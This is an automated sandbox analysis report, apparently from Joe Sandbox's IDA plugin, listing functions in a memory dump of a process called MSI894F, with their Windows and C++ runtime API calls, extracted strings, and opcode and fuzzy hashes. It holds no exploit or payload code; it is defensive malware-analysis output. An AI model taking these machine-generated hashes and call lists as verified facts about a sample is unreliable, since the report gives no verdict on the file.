Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: f04e5873b3a27155d4ac584adafbe0ccd309139450b6d3f10e04a07ba28b8a39
Instruction ID: a4793069deeead39e5b401daacec7473bb356ce4cfcc82035542d9c91ae681e6
Opcode Fuzzy Hash: f04e5873b3a27155d4ac584adafbe0ccd309139450b6d3f10e04a07ba28b8a39
Instruction Fuzzy Hash: CB01AD71904619DBCF01AB64E8566BE7771EF84321F28050AEC11AB392DF749E098BB1

Function 00D57C1D Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D57C24
std::_Lockit::_Lockit.LIBCPMT ref: 00D57C2E

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

moneypunct.LIBCPMT ref: 00D57C68
std::_Facet_Register.LIBCPMT ref: 00D57C7F
std::_Lockit::~_Lockit.LIBCPMT ref: 00D57C9F

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: caaf14afd9a3feb4eee561b634544f90755c93f14f0c846db45fcecdf449e141
Instruction ID: 7ab118c242256a0afb377ac2113007cf8476a16793d7e2dd7931e09bf2fbe06c
Opcode Fuzzy Hash: caaf14afd9a3feb4eee561b634544f90755c93f14f0c846db45fcecdf449e141
Instruction Fuzzy Hash: A901C0319002198BCF11EB64E9566BE77A1EF80321F280409EC11AB3D2CF74AE098BB5

Function 00D57DDC Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D57DE3
std::_Lockit::_Lockit.LIBCPMT ref: 00D57DED

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

moneypunct.LIBCPMT ref: 00D57E27
std::_Facet_Register.LIBCPMT ref: 00D57E3E
std::_Lockit::~_Lockit.LIBCPMT ref: 00D57E5E

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: 9e631c2d9599c6f2b90d135968a14bf99ef31b290518fdfe988fe45f174ce540
Instruction ID: 9a338cab493661b29efda8a648293be95df0f205e635f5d5386534ea61e51ce9
Opcode Fuzzy Hash: 9e631c2d9599c6f2b90d135968a14bf99ef31b290518fdfe988fe45f174ce540
Instruction Fuzzy Hash: 0301003190071A9BCF01EB64E8566BE77A1EF84321F280049FD11AB3D1DF749E058BB0

Function 00D57D47 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D57D4E
std::_Lockit::_Lockit.LIBCPMT ref: 00D57D58

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

moneypunct.LIBCPMT ref: 00D57D92
std::_Facet_Register.LIBCPMT ref: 00D57DA9
std::_Lockit::~_Lockit.LIBCPMT ref: 00D57DC9

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: 28d05e8dd4a788c60021a5ada3b274ce13e0715d8aa4770303a01788b16374cf
Instruction ID: b57fdd7f63a41cdb4bd36aa172dca2fabdf02a7236bbbee20fd9a4ddb9e0729b
Opcode Fuzzy Hash: 28d05e8dd4a788c60021a5ada3b274ce13e0715d8aa4770303a01788b16374cf
Instruction Fuzzy Hash: 5C01AD71900619CBCF01EF64E856ABE77B1EF85321F28000AEC10AB391DF749A058BB5

Function 00D6782B Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00DA4AF8,?,?,00D42627,00DA571C,00D8CCC0), ref: 00D67835
LeaveCriticalSection.KERNEL32(00DA4AF8,?,?,00D42627,00DA571C,00D8CCC0), ref: 00D67868
RtlWakeAllConditionVariable.NTDLL ref: 00D678DF
SetEvent.KERNEL32(?,00D42627,00DA571C,00D8CCC0), ref: 00D678E9
ResetEvent.KERNEL32(?,00D42627,00DA571C,00D8CCC0), ref: 00D678F5

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID:
API String ID: 3916383385-0
Opcode ID: 8ca3a148ba29f1581bc947b873d14429234d1a0f90b182a9d1e34033091f4f74
Instruction ID: 8d58709fb60ff3792549b5584d40239db6245e49310fdce77a58b86413614336
Opcode Fuzzy Hash: 8ca3a148ba29f1581bc947b873d14429234d1a0f90b182a9d1e34033091f4f74
Instruction Fuzzy Hash: F7011931A56320DBC715AF18FC48A947B66FB8A715B05406AF802D33A0CBB05D01DBB8

Function 00D46090 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00D460F4
GetLastError.KERNEL32 ref: 00D46190

Part of subcall function 00D41FC0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000000,00D8938D,000000FF,?,80070057,?,?,00000000,00000010,00D41B09,?), ref: 00D42040

LoadLibraryExW.KERNEL32(?,00000000,00000000,00000009,00D9B2DC,00000001,00000000), ref: 00D4614E

Strings

ntdll.dll, xrefs: 00D46126

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: DirectoryErrorFindLastLibraryLoadResourceSystem
String ID: ntdll.dll
API String ID: 4113295189-2227199552
Opcode ID: edfefe5b298a71d63cc7b9a24c0da70f71676976cd4c231fefb918c505d7464c
Instruction ID: 6872220dd014aa0c85c1d0651bb2200817fac9d6ccbe6eb8e5807b395abf4c43
Opcode Fuzzy Hash: edfefe5b298a71d63cc7b9a24c0da70f71676976cd4c231fefb918c505d7464c
Instruction Fuzzy Hash: B5317C716007089FDB20DF69CC45BAEB7F5FB55710F14861AE426D72D1EB70A904CBA1

Function 00D5D2C2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D5D2C9

Part of subcall function 00D56FF9: _Maklocstr.LIBCPMT ref: 00D57019
Part of subcall function 00D56FF9: _Maklocstr.LIBCPMT ref: 00D57036
Part of subcall function 00D56FF9: _Maklocstr.LIBCPMT ref: 00D57053
Part of subcall function 00D56FF9: _Maklocchr.LIBCPMT ref: 00D57065
Part of subcall function 00D56FF9: _Maklocchr.LIBCPMT ref: 00D57078

_Mpunct.LIBCPMT ref: 00D5D356
_Mpunct.LIBCPMT ref: 00D5D370

Strings

$+xv, xrefs: 00D5D37B

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Maklocstr$MaklocchrMpunct$H_prolog3
String ID: $+xv
API String ID: 2939335142-1686923651
Opcode ID: 2a1649efc21bce908d22d2bcb4a0c8878143bc713fa6e08af054a24047e505a0
Instruction ID: 15ff97fcd7fce6936f2fce7ef0e3c9f7e20588fdf4ca92246d2c999e7b3241c0
Opcode Fuzzy Hash: 2a1649efc21bce908d22d2bcb4a0c8878143bc713fa6e08af054a24047e505a0
Instruction Fuzzy Hash: B12192B1904B52AFDB25DF75C49073BBEF8AB09701F04465AE899C7A41E734E605CBB0

Function 00D64DF4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D64DFB
_Mpunct.LIBCPMT ref: 00D64E88
_Mpunct.LIBCPMT ref: 00D64EA2

Strings

$+xv, xrefs: 00D64EAD

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Mpunct$H_prolog3
String ID: $+xv
API String ID: 4281374311-1686923651
Opcode ID: 0f461feb3b837ac4d964552a4cad9524c9ce602b5fba9146a539bbc6951b616e
Instruction ID: c93a1c0274b6f49502b1ae34fc28ee239c9f96147e40503c8bf5f427c918462d
Opcode Fuzzy Hash: 0f461feb3b837ac4d964552a4cad9524c9ce602b5fba9146a539bbc6951b616e
Instruction Fuzzy Hash: D72181B1904B92AFD725DF75845073BBEE8BB09711F04451AE499C7A42D734E605CBB0

Function 00D6C012 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D6BFC3,00000000,?,00DA4EA4,?,?,?,00D6C166,00000004,InitializeCriticalSectionEx,00D8F92C,InitializeCriticalSectionEx), ref: 00D6C01F
GetLastError.KERNEL32(?,00D6BFC3,00000000,?,00DA4EA4,?,?,?,00D6C166,00000004,InitializeCriticalSectionEx,00D8F92C,InitializeCriticalSectionEx,00000000,?,00D6BF1D), ref: 00D6C029
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D6C051

Strings

api-ms-, xrefs: 00D6C036

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 89558118954dcc196ac04a28fbf5e9496475404c032c3e1856061a03aa2fe633
Instruction ID: 30bb7a4a6f3f454761358d55c64c09bf6149e2f6d12647f193a43570eb78df1f
Opcode Fuzzy Hash: 89558118954dcc196ac04a28fbf5e9496475404c032c3e1856061a03aa2fe633
Instruction Fuzzy Hash: F7E04F70290308FBEF202B61ED0AB693F5A9F00B51F644030FA4CE81E0E761E955A7F4

Function 00D4E350 Relevance: 6.4, APIs: 4, Instructions: 426COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 00D4E3F0
_strcspn.LIBCMT ref: 00D4E412
LocalFree.KERNEL32(?), ref: 00D4E77B
LocalFree.KERNEL32(?), ref: 00D4E7C3

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: FreeLocal_strcspn
String ID:
API String ID: 2585785616-0
Opcode ID: 261c81656ccc2b20b08a839d30d6c06de70327e5062a02fb83de6b16aab05ded
Instruction ID: fe83b9d5df74a04c0de06f79457acb93b28db5f6f37f3a345fb766f8e547c737
Opcode Fuzzy Hash: 261c81656ccc2b20b08a839d30d6c06de70327e5062a02fb83de6b16aab05ded
Instruction Fuzzy Hash: A2F15671A00249EFDF15CFA8C884AEEBBF6FF48314F144169E815AB251D731EA41CBA0

Function 00D8738B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(7EBC463A,?,00000000,?), ref: 00D873EE

Part of subcall function 00D8002B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00D7C527,?,00000000,-00000008), ref: 00D800D7

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D87649
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D87691
GetLastError.KERNEL32 ref: 00D87734

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: c4627a055751a2235310261c27b8e003c9e48cf3ff09f14a650ac51acb8b9203
Instruction ID: 632cbcfc575521e790abfc20b3b854f74ef4f3a0590598f01a2e19c80c8e4994
Opcode Fuzzy Hash: c4627a055751a2235310261c27b8e003c9e48cf3ff09f14a650ac51acb8b9203
Instruction Fuzzy Hash: A2D17BB5D046489FCF15DFA8D880AADBBB5FF09300F28456AE855EB351E730E946CB60

Function 00D58872 Relevance: 6.3, APIs: 4, Instructions: 313COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D58879
_strcspn.LIBCMT ref: 00D588E4
_strcspn.LIBCMT ref: 00D58904
ctype.LIBCPMT ref: 00D58974

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: _strcspn$H_prolog3_ctype
String ID:
API String ID: 838279627-0
Opcode ID: eedae2f22effe622ed83914f72827a1cf7d20f11e304fd6f22227b12686f9a4a
Instruction ID: 6ac81393df14114e3bb08f86142667e9ea69c928f5e3855e667339ccfe21b2c1
Opcode Fuzzy Hash: eedae2f22effe622ed83914f72827a1cf7d20f11e304fd6f22227b12686f9a4a
Instruction Fuzzy Hash: CCC138719002499FDF15DF98C981AEEBBB9EF48311F64401AEC05BB251DB30AE49DBB1

Function 00D52A16 Relevance: 6.3, APIs: 4, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D52A1D
_strcspn.LIBCMT ref: 00D52A88
_strcspn.LIBCMT ref: 00D52AA8
ctype.LIBCPMT ref: 00D52B18

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: _strcspn$H_prolog3_ctype
String ID:
API String ID: 838279627-0
Opcode ID: 1b2cc949c89f0abcff2f89d4403f79a9e3bfdf8deecbace9f4b19c182ad9f61c
Instruction ID: 3c38e41c46b7f122787e65c04925bb27af9ff8a1e725a202ab9fcd8dd86d2c65
Opcode Fuzzy Hash: 1b2cc949c89f0abcff2f89d4403f79a9e3bfdf8deecbace9f4b19c182ad9f61c
Instruction Fuzzy Hash: 9DC17971900209AFDF14DFA8C980AFEBBB9EF09311F14401AEC05AB255D730AE49CBB1

Function 00D6AFD5 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00D6B09C
___AdjustPointer.LIBCMT ref: 00D6B0BF
___AdjustPointer.LIBCMT ref: 00D6B15B

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 7f553c4a57a58da9009a10ae0f1d6584bb7120d6a05e570131f66ffca3340da0
Instruction ID: 30b898449390761bafa048dc292de4da1d0a58d44093bbff288aff605d1ade89
Opcode Fuzzy Hash: 7f553c4a57a58da9009a10ae0f1d6584bb7120d6a05e570131f66ffca3340da0
Instruction Fuzzy Hash: 0A51B272600302AFDB258F54D851B6A7BA4EF52320F18452EEC52C7291EB35EDC1DB70

Function 00D77B18 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 222f340505da25c8410851adbb028a1a874c48c0b263b438d49d742a18bcb489
Instruction ID: 2a53b7a911abb76f7832b6313fc1923519b0d30bd124281b1c2363a51a83fe0d
Opcode Fuzzy Hash: 222f340505da25c8410851adbb028a1a874c48c0b263b438d49d742a18bcb489
Instruction Fuzzy Hash: B1215871608605AF9B21AFA1CC81D6B77A9EF44368714CD25F959D7251FB30EC5087B0

Function 00D49020 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,75EF5490,00D48B3A,00000000,?,?,?,?,?,?,?,00000000,00D8A285,000000FF), ref: 00D49027

Strings

> returned:, xrefs: 00D49036
Last error=, xrefs: 00D49081
Call to ShellExecute() for verb<, xrefs: 00D49031

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: ErrorLast
String ID: > returned:$Call to ShellExecute() for verb<$Last error=
API String ID: 1452528299-1781106413
Opcode ID: 30bd8fa684c12f275acebef89065545799b9ba43525c4c10c3b392934664f11b
Instruction ID: 2b980b08f5aa84d2a4c9a7cc666aac352ee72de877114e086297ec83a3ebbabe
Opcode Fuzzy Hash: 30bd8fa684c12f275acebef89065545799b9ba43525c4c10c3b392934664f11b
Instruction Fuzzy Hash: D4217959A2026187CF746F69941133AA3F0EF54765F2A046FE8C9C7394EA698C81C3B1

Function 00D51400 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,7EBC463A), ref: 00D5143C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00D5145C
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00D5148D
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00D514A6

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: 4b3ed5decb146c4290a4492c2398756688f5b329eece4917bc4db32de8cce2c7
Instruction ID: 0a27104824726581e0e147354c90e8a8a21b9cc802f31ad32964b5be73824d15
Opcode Fuzzy Hash: 4b3ed5decb146c4290a4492c2398756688f5b329eece4917bc4db32de8cce2c7
Instruction Fuzzy Hash: F4218174951314AFDB209F54DC0AFAABBB8FB05B24F10421AF910EB3C0DBB45A05CBA4

Function 00D580C5 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D580CC
std::_Lockit::_Lockit.LIBCPMT ref: 00D580D6

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

std::_Facet_Register.LIBCPMT ref: 00D58127
std::_Lockit::~_Lockit.LIBCPMT ref: 00D58147

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: a33deeb1be3cf03d26877ac11bc42490aef4dcaba81a12944135227a55efe2ec
Instruction ID: b598ee1127cfb4affe9b2c7da5634b5929101b895c522200902d5ea093b7e20f
Opcode Fuzzy Hash: a33deeb1be3cf03d26877ac11bc42490aef4dcaba81a12944135227a55efe2ec
Instruction Fuzzy Hash: C401C0719007199BCF01EB64D856AAE7761EF80321F290409EC21AB391DF749E0A9BB5

Function 00D581EF Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D581F6
std::_Lockit::_Lockit.LIBCPMT ref: 00D58200

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

std::_Facet_Register.LIBCPMT ref: 00D58251
std::_Lockit::~_Lockit.LIBCPMT ref: 00D58271

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
